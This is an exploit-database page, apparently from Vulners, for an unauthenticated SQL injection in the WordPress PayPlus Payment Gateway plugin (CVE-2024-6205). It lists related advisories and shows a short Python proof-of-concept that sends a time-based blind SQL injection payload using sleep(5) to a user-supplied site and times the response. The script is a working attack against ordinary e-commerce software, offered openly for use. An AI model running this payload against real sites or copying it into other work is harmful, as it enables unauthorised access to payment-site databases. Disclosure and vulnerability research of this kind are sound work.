Lucene search
+L

WordPress PayPlus Payment Gateway SQL Injection Exploit

🗓️ 07 Aug 2024 00:00:00Reported by j3r1ch0123Type 
zdt
 zdt
🔗 0day.today👁 168 Views

WordPress PayPlus Payment Gateway SQL Injection Exploi

Related
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for SQL Injection in Payplus Payplus_Payment_Gateway
21 Jul 202404:59
githubexploit
circl
Circl
CVE-2024-6205
19 Jul 202408:40
circl
cve
CVE
CVE-2024-6205
19 Jul 202406:00
cve
cvelist
Cvelist
CVE-2024-6205 PayPlus Payment Gateway < 6.6.9 - Unauthenticated SQLi
19 Jul 202406:00
cvelist
kitploit
Kitploit
CVE-2024-6205
4 Sep 202608:49
kitploit
nuclei
Nuclei
PayPlus Payment Gateway < 6.6.9 - SQL Injection
4 Sep 202602:04
nuclei
nvd
NVD
CVE-2024-6205
19 Jul 202406:15
nvd
osv
OSV
CVE-2024-6205
19 Jul 202406:15
osv
packetstorm
Packet Storm
WordPress PayPlus Payment Gateway SQL Injection
7 Aug 202400:00
packetstorm
patchstack
Patchstack
WordPress PayPlus Payment Gateway plugin <= 6.6.8 - Unauthenticated SQL Injection vulnerability
2 Jul 202401:58
patchstack
Rows per page
#!/usr/bin/env python3.11
import requests
import time

def exploit(url):
    payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}

    start = time.time()
    with requests.Session() as session:
        session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
        })
        response = requests.get(url, params=payload)
        print(f"Exploiting {url}...")

        end = time.time()
        print(response.status_code)
        response_time = end - start
        print(f"Response time: {response_time}...")

if __name__ == "__main__":
    url = input("Enter the vulnerable URL (e.g., https://test.site): ")
    if not url.startswith("http"):
        url = "http://" + url
    exploit(url)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Aug 2024 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
EPSS0.04134
SSVC
168